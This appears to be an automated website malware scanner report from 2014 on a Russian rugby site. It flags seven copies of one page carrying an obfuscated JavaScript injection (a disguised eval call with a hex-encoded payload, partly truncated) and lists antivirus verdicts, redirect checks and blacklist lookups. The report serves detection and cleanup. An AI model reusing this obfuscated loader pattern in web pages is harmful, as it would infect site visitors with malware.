Malware Scanner report for rugbymai.ru

Malicious/Suspicious/Total urls checked: 7/0/15

7 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://rugbymai.ru/	200 OK Content-Length: 41479 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ
http://rugbymai.ru/sponsor/../sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ
http://rugbymai.ru/sponsor/../sponsor/../sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm	200 OK Content-Length: 1288 Content-Type: text/html	clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm	200 OK Content-Length: 51301 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c ... 20219 bytes are skipped ...3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b'); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Agent-CQO [Trj] Ad-Aware JS:Trojan.Crypt.IQ nProtect JS:Trojan.Crypt.IQ TrendMicro-HouseCall TROJ_GEN.F47V0424 Emsisoft JS:Trojan.Crypt.IQ (B) Microsoft VirTool:JS/Obfuscator.DO MicroWorld-eScan JS:Trojan.Crypt.IQ F-Secure JS:Trojan.Crypt.IQ AVG HTML/Framer GData JS:Trojan.Crypt.IQ Commtouch JS/Obf.A.gen BitDefender JS:Trojan.Crypt.IQ

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rugbymai.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Apr 2014 16:55:13 GMT
Accept-Ranges: bytes
ETag: "13258ea-a207-487aa0b9ef700"
Server: nginx
Vary: Accept-Encoding
Content-Length: 41479
Content-Type: text/html
Last-Modified: Fri, 28 May 2010 16:31:56 GMT

...41479 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: rugbymai.ru
Referer: http://www.google.com/search?q=rugbymai.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rugbymai.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://rugbymai.ru/

Result: rugbymai.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for rugbymai.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools